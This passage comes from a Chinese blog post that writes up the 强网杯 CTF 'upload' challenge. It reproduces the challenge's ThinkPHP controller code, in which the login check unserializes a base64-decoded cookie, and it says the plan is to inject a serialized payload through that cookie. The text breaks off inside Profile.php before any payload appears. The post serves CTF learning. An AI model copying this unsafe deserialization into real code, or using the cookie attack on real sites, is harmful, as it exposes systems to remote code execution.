<!DOCTYPE html>
<html class="has-navbar-fixed-top">
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
<title>强网杯upload Writeup与简单分析 - Threezh1&#39;s blog</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/outdated-browser/1.1.5/outdatedbrowser.min.css">




<meta name="description" content="Share learn & Share life.">



<meta name="keywords" content="Threezh1">



    <meta name="description" content="&amp;#x7B2C;&amp;#x4E00;&amp;#x6B21;&amp;#x6253;&amp;#x5F3A;&amp;#x7F51;&amp;#x676F;&amp;#xFF0C;&amp;#x6CA1;&amp;#x60F3;&amp;#x5230;&amp;#x8FD9;&amp;#x4E48;&amp;#x96BE;&amp;#xFF0C;&amp;#x840C;&amp;#x65B0;&amp;#x745F;&amp;#x745F;&amp;#x53D1;&amp;#x6296;&amp;#x3002;BY Threezh1 &amp;#x9898;&amp;#x7">
<meta name="keywords" content="Writeup,PHP,代码审计">
<meta property="og:type" content="article">
<meta property="og:title" content="强网杯upload Writeup与简单分析">
<meta property="og:url" content="http://yoursite.com/2019/05/26/强网杯upload Writeup与简单分析/index.html">
<meta property="og:site_name" content="Threezh1&#39;s blog">
<meta property="og:description" content="&amp;#x7B2C;&amp;#x4E00;&amp;#x6B21;&amp;#x6253;&amp;#x5F3A;&amp;#x7F51;&amp;#x676F;&amp;#xFF0C;&amp;#x6CA1;&amp;#x60F3;&amp;#x5230;&amp;#x8FD9;&amp;#x4E48;&amp;#x96BE;&amp;#xFF0C;&amp;#x840C;&amp;#x65B0;&amp;#x745F;&amp;#x745F;&amp;#x53D1;&amp;#x6296;&amp;#x3002;BY Threezh1 &amp;#x9898;&amp;#x7">
<meta property="og:locale" content="Chinese">
<meta property="og:image" content="https://i.loli.net/2019/05/26/5cea55c1ec25028053.jpg">
<meta property="og:image" content="https://i.loli.net/2019/05/26/5cea55c3c204d65669.jpg">
<meta property="og:image" content="https://i.loli.net/2019/05/26/5cea55c23688270315.jpg">
<meta property="og:updated_time" content="2020-02-25T15:37:42.227Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="强网杯upload Writeup与简单分析">
<meta name="twitter:description" content="&amp;#x7B2C;&amp;#x4E00;&amp;#x6B21;&amp;#x6253;&amp;#x5F3A;&amp;#x7F51;&amp;#x676F;&amp;#xFF0C;&amp;#x6CA1;&amp;#x60F3;&amp;#x5230;&amp;#x8FD9;&amp;#x4E48;&amp;#x96BE;&amp;#xFF0C;&amp;#x840C;&amp;#x65B0;&amp;#x745F;&amp;#x745F;&amp;#x53D1;&amp;#x6296;&amp;#x3002;BY Threezh1 &amp;#x9898;&amp;#x7">
<meta name="twitter:image" content="https://i.loli.net/2019/05/26/5cea55c1ec25028053.jpg">





<link rel="icon" href="/favicon.png">


<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Ovo|Source+Code+Pro">
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/bulma/0.6.2/css/bulma.min.css">


<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/lightgallery/1.6.8/css/lightgallery.min.css">
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/justifiedGallery/3.6.5/css/justifiedGallery.min.css">


<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/styles/atom-one-light.min.css">

<link rel="stylesheet" href="/css/style.css">

<script defer src="//use.fontawesome.com/releases/v5.0.8/js/all.js"></script>


    
    
    
    
    
    
    
    
    


</head>
<body>
    
<nav class="navbar is-transparent is-fixed-top navbar-main" role="navigation" aria-label="main navigation">
    <div class="container">
        <div class="navbar-brand">
            <a class="navbar-item navbar-logo" href="/">
                
                <img src="/images/logo.png" alt height="28">
                
            </a>
            <div class="navbar-burger">
                <span></span>
                <span></span>
                <span></span>
            </div>
        </div>
        
        <div class="navbar-menu navbar-start">
            
            <a class="navbar-item " href="/archives">归档</a>
            
            <a class="navbar-item " href="/Projects">项目</a>
            
            <a class="navbar-item " href="/Life">生活</a>
            
            <a class="navbar-item " href="/Photography">摄影</a>
            
            <a class="navbar-item " href="/about">关于</a>
            
            <a class="navbar-item " href="http://119.3.219.188/">Threeday</a>
            
        </div>
        
        <div class="navbar-menu navbar-end">
            
            <a class="navbar-item search" title="Suche" href="javascript:;">
                <i class="fas fa-search"></i>
            </a>
            
            
            <div class="navbar-item is-hoverable has-dropdown is-hidden-mobile is-hidden-tablet-only toc">
                <a class="navbar-item" title="Inhaltsverzeichnis">
                    <i class="fa fa-list"></i>
                </a>
                <div class="navbar-dropdown is-right">
                    
                    
                    
                    
                    <a class="navbar-item" href="#题目分析">1&nbsp;&nbsp;<b>题目分析</b></a>
                    
                    
                    <hr class="navbar-divider">
                    
                    
                    <a class="navbar-item" href="#根据payload来看解题的思路">2&nbsp;&nbsp;<b>根据payload来看解题的思路</b></a>
                    
                    
                    <hr class="navbar-divider">
                    
                    
                    <a class="navbar-item" href="#复现">3&nbsp;&nbsp;<b>复现</b></a>
                    
                    
                    <hr class="navbar-divider">
                    
                    
                    <a class="navbar-item" href="#总结">4&nbsp;&nbsp;<b>总结</b></a>
                    
                </div>
            </div>
            
            
            <a class="navbar-item" title="GitHub" href="https://github.com/Threezh1">
                
                <i class="fab fa-github"></i>
                
            </a>
               
            
        </div>
    </div>
</nav>

    <section class="section">
    <div class="container">
    <article class="article content gallery" itemscope itemprop="blogPost">
    <h1 class="article-title is-size-3 is-size-4-mobile" itemprop="name">
        
            强网杯upload Writeup与简单分析
        
    </h1>
    <div class="article-meta columns is-variable is-1 is-multiline is-mobile is-size-7-mobile">
        <span class="column is-narrow">
            <time datetime="2019-05-26T09:14:26.000Z" itemprop="datePublished">May 26 2019</time>
        </span>
        
        <span class="column is-narrow article-category">
            <i class="far fa-folder"></i>
            <a class="article-category-link" href="/categories/技术文章/">技术文章</a>
        </span>
        
        
        <span class="column is-narrow">
            
            
            17 minutes lesen (Über 2551 Wörter)
        </span>
        
    </div>
    <div class="article-entry is-size-6-mobile" itemprop="articleBody">
    
        <p>&#x7B2C;&#x4E00;&#x6B21;&#x6253;&#x5F3A;&#x7F51;&#x676F;&#xFF0C;&#x6CA1;&#x60F3;&#x5230;&#x8FD9;&#x4E48;&#x96BE;&#xFF0C;&#x840C;&#x65B0;&#x745F;&#x745F;&#x53D1;&#x6296;&#x3002;BY Threezh1</p>
<p>&#x9898;&#x76EE;&#x6709;&#x70B9;&#x7ED5;&#xFF0C;&#x770B;&#x4E86;&#x534A;&#x5929;&#x90FD;&#x6CA1;&#x627E;&#x5230;&#x91CD;&#x70B9;&#x3002;&#x540E;&#x9762;&#x8FD8;&#x662F;&#x9760;&#x5B66;&#x957F;&#x7ED9;&#x7684;payload&#x601D;&#x8DEF;&#x7406;&#x6E05;&#x695A;&#x4E86;&#x8FC7;&#x7A0B;&#x3002;&#x8FD9;&#x91CC;&#x5C31;&#x8BB0;&#x5F55;&#x4E00;&#x4E0B;&#xFF0C;&#x5B66;&#x4E60;&#x5B66;&#x4E60;&#x3002;<br><a id="more"></a></p>
<h2 id="&#x9898;&#x76EE;&#x5206;&#x6790;"><a href="#&#x9898;&#x76EE;&#x5206;&#x6790;" class="headerlink" title="&#x9898;&#x76EE;&#x5206;&#x6790;"></a>&#x9898;&#x76EE;&#x5206;&#x6790;</h2><p><strong>&#x7F51;&#x7AD9;&#x57FA;&#x672C;&#x529F;&#x80FD;&#xFF1A;</strong></p>
<p>&#x6CE8;&#x518C;&#x767B;&#x5F55;&#x540E;&#xFF0C;&#x53EF;&#x4EE5;&#x4E0A;&#x4F20;&#x4E00;&#x5F20;&#x56FE;&#x7247;&#x4F5C;&#x4E3A;&#x5934;&#x50CF;&#x3002;</p>
<p>&#x65E0;&#x8BBA;&#x4E0A;&#x4F20;&#x4EC0;&#x4E48;&#x683C;&#x5F0F;&#x7684;&#x6587;&#x4EF6;&#xFF0C;&#x6587;&#x4EF6;&#x540D;&#x90FD;&#x4F1A;&#x4FEE;&#x6539;&#x4E3A;<code>md5&#x503C;.png</code></p>
<p><strong>&#x5206;&#x6790;&#xFF1A;</strong></p>
<p>&#x4F7F;&#x7528;dirsearch&#x7B49;&#x5DE5;&#x5177;&#x53EF;&#x4EE5;&#x76F4;&#x63A5;&#x626B;&#x5230;&#x7F51;&#x7AD9;&#x6E90;&#x7801;&#x5730;&#x5740;&#xFF1A;</p>
<p><a href="http://49.4.6.176:32288/www.tar.gz" target="_blank" rel="noopener">http://49.4.6.176:32288/www.tar.gz</a></p>
<p>&#x6846;&#x67B6;&#x4E3A;TP5&#xFF0C;&#x76F4;&#x63A5;&#x770B;application/web/controller&#x76EE;&#x5F55;&#x3002;&#x5305;&#x62EC;&#x4E86;&#x4EE5;&#x4E0B;&#x51E0;&#x4E2A;&#x6A21;&#x5757;&#xFF0C;&#x5206;&#x522B;&#x5BF9;&#x5E94;&#x4E86;&#x7F51;&#x7AD9;&#x7684;&#x51E0;&#x4E2A;&#x529F;&#x80FD;&#x3002;&#x7531;&#x4E8E;Login.php&#x91CC;&#x6CA1;&#x6709;&#x5BF9;&#x89E3;&#x9898;&#x6709;&#x7528;&#x7684;&#x4FE1;&#x606F;&#xFF0C;&#x6211;&#x4EEC;&#x5C31;&#x53EA;&#x770B;&#x5176;&#x4ED6;&#x4E09;&#x4E2A;&#x9875;&#x9762;&#x3002;</p>
<pre><code>Index.php         //&#x8D26;&#x6237;&#x9996;&#x9875;
Login.php         //&#x767B;&#x9646;
Profile.php     //&#x4E0A;&#x4F20;
Register.php     //&#x6CE8;&#x518C;
</code></pre><p><strong>Index.php</strong></p>
<p>&#x5B83;&#x7684;&#x4F5C;&#x7528;&#x4E3A;&#x5224;&#x65AD;&#x662F;&#x5426;&#x767B;&#x5F55;&#xFF0C;&#x6839;&#x636E;&#x662F;&#x5426;&#x5DF2;&#x7ECF;&#x4E0A;&#x4F20;&#x56FE;&#x7247;&#x6765;&#x663E;&#x793A;&#x6307;&#x5B9A;&#x7684;&#x7528;&#x6237;&#x4E3B;&#x9875;&#x6A21;&#x677F;&#x3002;</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line"><span class="hljs-keyword">namespace</span> <span class="hljs-title">app</span>\<span class="hljs-title">web</span>\<span class="hljs-title">controller</span>;</span><br><span class="line"><span class="hljs-keyword">use</span> <span class="hljs-title">think</span>\<span class="hljs-title">Controller</span>;</span><br><span class="line"></span><br><span class="line"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Index</span> <span class="hljs-keyword">extends</span> <span class="hljs-title">Controller</span></span></span><br><span class="line"><span class="hljs-class"></span>{</span><br><span class="line">    <span class="hljs-keyword">public</span> $profile;</span><br><span class="line">    <span class="hljs-keyword">public</span> $profile_db;</span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">index</span><span class="hljs-params">()</span></span></span><br><span class="line"><span class="hljs-function">    </span>{</span><br><span class="line">        <span class="hljs-keyword">if</span>(<span class="hljs-keyword">$this</span>-&gt;login_check()){   <span class="hljs-comment">//&#x5224;&#x65AD;&#x662F;&#x5426;&#x5DF2;&#x7ECF;&#x767B;&#x5F55;</span></span><br><span class="line">            $curr_url=<span class="hljs-string">&quot;http://&quot;</span>.$_SERVER[<span class="hljs-string">&apos;HTTP_HOST&apos;</span>].$_SERVER[<span class="hljs-string">&apos;SCRIPT_NAME&apos;</span>].<span class="hljs-string">&quot;/home&quot;</span>;</span><br><span class="line">            <span class="hljs-keyword">$this</span>-&gt;redirect($curr_url,<span class="hljs-number">302</span>);</span><br><span class="line">            <span class="hljs-keyword">exit</span>();</span><br><span class="line">        }</span><br><span class="line">        <span class="hljs-keyword">return</span> <span class="hljs-keyword">$this</span>-&gt;fetch(<span class="hljs-string">&quot;index&quot;</span>);</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">home</span><span class="hljs-params">()</span></span>{</span><br><span class="line">        <span class="hljs-keyword">if</span>(!<span class="hljs-keyword">$this</span>-&gt;login_check()){  <span class="hljs-comment">//&#x518D;&#x5224;&#x65AD;&#x662F;&#x5426;&#x767B;&#x5F55;</span></span><br><span class="line">            $curr_url=<span class="hljs-string">&quot;http://&quot;</span>.$_SERVER[<span class="hljs-string">&apos;HTTP_HOST&apos;</span>].$_SERVER[<span class="hljs-string">&apos;SCRIPT_NAME&apos;</span>].<span class="hljs-string">&quot;/index&quot;</span>;</span><br><span class="line">            <span class="hljs-keyword">$this</span>-&gt;redirect($curr_url,<span class="hljs-number">302</span>);</span><br><span class="line">            <span class="hljs-keyword">exit</span>();</span><br><span class="line">        }</span><br><span class="line"></span><br><span class="line">        <span class="hljs-keyword">if</span>(!<span class="hljs-keyword">$this</span>-&gt;check_upload_img()){ <span class="hljs-comment">//&#x68C0;&#x67E5;&#x662F;&#x5426;&#x5DF2;&#x7ECF;&#x4E0A;&#x4F20;&#x56FE;&#x7247;</span></span><br><span class="line">            <span class="hljs-keyword">$this</span>-&gt;assign(<span class="hljs-string">&quot;username&quot;</span>,<span class="hljs-keyword">$this</span>-&gt;profile_db[<span class="hljs-string">&apos;username&apos;</span>]);</span><br><span class="line">            <span class="hljs-keyword">return</span> <span class="hljs-keyword">$this</span>-&gt;fetch(<span class="hljs-string">&quot;upload&quot;</span>);</span><br><span class="line">        }<span class="hljs-keyword">else</span>{</span><br><span class="line">            <span class="hljs-keyword">$this</span>-&gt;assign(<span class="hljs-string">&quot;img&quot;</span>,<span class="hljs-keyword">$this</span>-&gt;profile_db[<span class="hljs-string">&apos;img&apos;</span>]);  <span class="hljs-comment">//</span></span><br><span class="line">            <span class="hljs-keyword">$this</span>-&gt;assign(<span class="hljs-string">&quot;username&quot;</span>,<span class="hljs-keyword">$this</span>-&gt;profile_db[<span class="hljs-string">&apos;username&apos;</span>]);</span><br><span class="line">            <span class="hljs-keyword">return</span> <span class="hljs-keyword">$this</span>-&gt;fetch(<span class="hljs-string">&quot;home&quot;</span>);</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">login_check</span><span class="hljs-params">()</span></span>{  <span class="hljs-comment">//&#x767B;&#x5F55;&#x68C0;&#x67E5;  </span></span><br><span class="line">        $profile=cookie(<span class="hljs-string">&apos;user&apos;</span>);    <span class="hljs-comment">//&#x83B7;&#x53D6;cookie</span></span><br><span class="line">        <span class="hljs-keyword">if</span>(!<span class="hljs-keyword">empty</span>($profile)){   <span class="hljs-comment">//&#x5224;&#x65AD;&#x662F;&#x5426;&#x4E3A;&#x7A7A;</span></span><br><span class="line">            <span class="hljs-keyword">$this</span>-&gt;profile=unserialize(base64_decode($profile));    <span class="hljs-comment">//&#x5C06;cookie&#x89E3;&#x7801;&#x540E;&#x53CD;&#x5E8F;&#x5217;&#x5316;</span></span><br><span class="line">            <span class="hljs-keyword">$this</span>-&gt;profile_db=db(<span class="hljs-string">&apos;user&apos;</span>)-&gt;where(<span class="hljs-string">&quot;ID&quot;</span>,intval(<span class="hljs-keyword">$this</span>-&gt;profile[<span class="hljs-string">&apos;ID&apos;</span>]))-&gt;find(); <span class="hljs-comment">//&#x6839;&#x636E;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x51FA;&#x6765;&#x7684;id&#x5728;&#x6570;&#x636E;&#x5E93;&#x4E2D;&#x67E5;&#x8BE2;</span></span><br><span class="line">            <span class="hljs-keyword">if</span>(array_diff(<span class="hljs-keyword">$this</span>-&gt;profile_db,<span class="hljs-keyword">$this</span>-&gt;profile)==<span class="hljs-keyword">null</span>){ <span class="hljs-comment">//&#x8FDB;&#x884C;&#x5DEE;&#x503C;&#x67E5;&#x8BE2;</span></span><br><span class="line">                <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;</span><br><span class="line">            }<span class="hljs-keyword">else</span>{</span><br><span class="line">                <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;</span><br><span class="line">            }</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">check_upload_img</span><span class="hljs-params">()</span></span>{ <span class="hljs-comment">//&#x68C0;&#x67E5;&#x662F;&#x5426;&#x5DF2;&#x7ECF;&#x4E0A;&#x4F20;&#x56FE;&#x7247;&#xFF0C;&#x6839;&#x636E;cookie&#x5F53;&#x4E2D;&#x548C;&#x67E5;&#x8BE2;&#x51FA;&#x6765;&#x7684;&#x6570;&#x636E;</span></span><br><span class="line">        <span class="hljs-keyword">if</span>(!<span class="hljs-keyword">empty</span>(<span class="hljs-keyword">$this</span>-&gt;profile) &amp;&amp; !<span class="hljs-keyword">empty</span>(<span class="hljs-keyword">$this</span>-&gt;profile_db)){</span><br><span class="line">            <span class="hljs-keyword">if</span>(<span class="hljs-keyword">empty</span>(<span class="hljs-keyword">$this</span>-&gt;profile_db[<span class="hljs-string">&apos;img&apos;</span>])){</span><br><span class="line">                <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;</span><br><span class="line">            }<span class="hljs-keyword">else</span>{</span><br><span class="line">                <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;</span><br><span class="line">            }</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">logout</span><span class="hljs-params">()</span></span>{</span><br><span class="line">        cookie(<span class="hljs-string">&quot;user&quot;</span>,<span class="hljs-keyword">null</span>);</span><br><span class="line">        $curr_url=<span class="hljs-string">&quot;http://&quot;</span>.$_SERVER[<span class="hljs-string">&apos;HTTP_HOST&apos;</span>].$_SERVER[<span class="hljs-string">&apos;SCRIPT_NAME&apos;</span>].<span class="hljs-string">&quot;/index&quot;</span>;</span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;redirect($curr_url,<span class="hljs-number">302</span>);</span><br><span class="line">        <span class="hljs-keyword">exit</span>();</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__get</span><span class="hljs-params">($name)</span></span></span><br><span class="line"><span class="hljs-function">    </span>{</span><br><span class="line">        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;&quot;</span>;</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">}</span><br></pre></td></tr></table></figure>

<p>&#x91CC;&#x9762;&#x4E0E;&#x4E00;&#x4E2A;&#x9898;&#x76EE;&#x76F8;&#x5173;&#x4E14;&#x91CD;&#x8981;&#x7684;&#x51FD;&#x6570;&#x4E3A;login_check()&#xFF1A;</p>
<p>&#x51FD;&#x6570;&#x4E2D;&#x5148;&#x83B7;&#x53D6;cookie&#xFF0C;&#x5982;&#x679C;cookie&#x4E0D;&#x4E3A;&#x7A7A;&#xFF0C;&#x5219;&#x5C06;cookie&#x8FDB;&#x884C;base64&#x89E3;&#x7801;&#x4E4B;&#x540E;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x3002;</p>
<p>&#x8FD9;&#x4E2A;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x51FD;&#x6570;&#x4E5F;&#x5C31;&#x662F;&#x89E3;&#x9898;&#x7684;&#x5165;&#x53E3;&#xFF0C;&#x6211;&#x4EEC;&#x7684;&#x76EE;&#x7684;&#x5C31;&#x662F;&#x6784;&#x9020;&#x5E8F;&#x5217;&#x5316;&#x7684;payload&#x8D4B;&#x503C;&#x5230;cookie&#x91CC;&#xFF0C;&#x7ECF;&#x8FC7;&#x53CD;&#x5E8F;&#x5217;&#x6267;&#x884C;&#x6211;&#x4EEC;&#x60F3;&#x8981;&#x7684;&#x547D;&#x4EE4;&#x3002;</p>
<p><strong>Profile.php</strong> </p>
<p>&#x5F53;&#x56FE;&#x7247;&#x4E0A;&#x4F20;&#x65F6;&#xFF0C;&#x6B64;&#x9875;&#x9762;&#x4F1A;&#x5BF9;&#x56FE;&#x7247;&#x8FDB;&#x884C;&#x4E00;&#x5B9A;&#x7684;&#x5904;&#x7406;&#x5E76;&#x66F4;&#x65B0;&#x7528;&#x6237;&#x4FE1;&#x606F;&#x548C;cookie&#x5185;&#x5BB9;&#x3002;</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line"><span class="hljs-keyword">namespace</span> <span class="hljs-title">app</span>\<span class="hljs-title">web</span>\<span class="hljs-title">controller</span>;</span><br><span class="line"></span><br><span class="line"><span class="hljs-keyword">use</span> <span class="hljs-title">think</span>\<span class="hljs-title">Controller</span>;</span><br><span class="line"></span><br><span class="line"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Profile</span> <span class="hljs-keyword">extends</span> <span class="hljs-title">Controller</span></span></span><br><span class="line"><span class="hljs-class"></span>{</span><br><span class="line">    <span class="hljs-keyword">public</span> $checker;</span><br><span class="line">    <span class="hljs-keyword">public</span> $filename_tmp;</span><br><span class="line">    <span class="hljs-keyword">public</span> $filename;</span><br><span class="line">    <span class="hljs-keyword">public</span> $upload_menu;</span><br><span class="line">    <span class="hljs-keyword">public</span> $ext;</span><br><span class="line">    <span class="hljs-keyword">public</span> $img;</span><br><span class="line">    <span class="hljs-keyword">public</span> $except;</span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span><span class="hljs-params">()</span>   </span></span><br><span class="line"><span class="hljs-function">    </span>{</span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;checker=<span class="hljs-keyword">new</span> Index(); </span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;upload_menu=md5($_SERVER[<span class="hljs-string">&apos;REMOTE_ADDR&apos;</span>]);</span><br><span class="line">        @chdir(<span class="hljs-string">&quot;../public/upload&quot;</span>); </span><br><span class="line">        <span class="hljs-keyword">if</span>(!is_dir(<span class="hljs-keyword">$this</span>-&gt;upload_menu)){</span><br><span class="line">            @mkdir(<span class="hljs-keyword">$this</span>-&gt;upload_menu);</span><br><span class="line">        }</span><br><span class="line">        @chdir(<span class="hljs-keyword">$this</span>-&gt;upload_menu);</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">upload_img</span><span class="hljs-params">()</span></span>{ </span><br><span class="line">        <span class="hljs-keyword">if</span>(<span class="hljs-keyword">$this</span>-&gt;checker){ </span><br><span class="line">            <span class="hljs-keyword">if</span>(!<span class="hljs-keyword">$this</span>-&gt;checker-&gt;login_check()){ </span><br><span class="line">                $curr_url=<span class="hljs-string">&quot;http://&quot;</span>.$_SERVER[<span class="hljs-string">&apos;HTTP_HOST&apos;</span>].$_SERVER[<span class="hljs-string">&apos;SCRIPT_NAME&apos;</span>].<span class="hljs-string">&quot;/index&quot;</span>;</span><br><span class="line">                <span class="hljs-keyword">$this</span>-&gt;redirect($curr_url,<span class="hljs-number">302</span>);</span><br><span class="line">                <span class="hljs-keyword">exit</span>();</span><br><span class="line">            }</span><br><span class="line">        }</span><br><span class="line"></span><br><span class="line">        <span class="hljs-keyword">if</span>(!<span class="hljs-keyword">empty</span>($_FILES)){    <span class="hljs-comment">//&#x7ED9;&#x56FE;&#x7247;&#x52A0;&#x4E2A;&#x540E;&#x7F00;.png</span></span><br><span class="line">            <span class="hljs-keyword">$this</span>-&gt;filename_tmp=$_FILES[<span class="hljs-string">&apos;upload_file&apos;</span>][<span class="hljs-string">&apos;tmp_name&apos;</span>];     <span class="hljs-comment">//&#x539F;&#x56FE;&#x7247;&#x7684;&#x540D;&#x5B57;</span></span><br><span class="line">            <span class="hljs-keyword">$this</span>-&gt;filename=md5($_FILES[<span class="hljs-string">&apos;upload_file&apos;</span>][<span class="hljs-string">&apos;name&apos;</span>]).<span class="hljs-string">&quot;.png&quot;</span>; <span class="hljs-comment">//&#x4FEE;&#x6539;&#x540E;&#x7684;&#x56FE;&#x7247;&#x540D;&#x5B57;</span></span><br><span class="line">            <span class="hljs-keyword">$this</span>-&gt;ext_check();     <span class="hljs-comment">//&#x8FDB;&#x884C;&#x56FE;&#x7247;&#x68C0;&#x67E5;</span></span><br><span class="line">        }</span><br><span class="line">        <span class="hljs-keyword">if</span>(<span class="hljs-keyword">$this</span>-&gt;ext) {    <span class="hljs-comment">//&#x5224;&#x65AD;&#x662F;&#x5426;&#x6210;&#x529F;&#x4FEE;&#x6539;&#x540E;&#x7F00;</span></span><br><span class="line">            <span class="hljs-keyword">if</span>(getimagesize(<span class="hljs-keyword">$this</span>-&gt;filename_tmp)) {                <span class="hljs-comment">//&#x83B7;&#x53D6;&#x56FE;&#x7247;&#x5927;&#x5C0F;</span></span><br><span class="line">                @copy(<span class="hljs-keyword">$this</span>-&gt;filename_tmp, <span class="hljs-keyword">$this</span>-&gt;filename);       <span class="hljs-comment">//&#x5C06;&#x8001;&#x56FE;&#x7247;&#x7684;&#x5730;&#x5740;&#x6539;&#x4E3A;&#x4FEE;&#x6539;&#x540E;&#x7684;&#x5730;&#x5740;&#x3002;</span></span><br><span class="line">                @unlink(<span class="hljs-keyword">$this</span>-&gt;filename_tmp);              <span class="hljs-comment">//&#x5220;&#x9664;</span></span><br><span class="line">                <span class="hljs-keyword">$this</span>-&gt;img=<span class="hljs-string">&quot;../upload/$this-&gt;upload_menu/$this-&gt;filename&quot;</span>;    <span class="hljs-comment">//&#x8D4B;&#x503C;$this-&gt;img</span></span><br><span class="line">                <span class="hljs-keyword">$this</span>-&gt;update_img();    <span 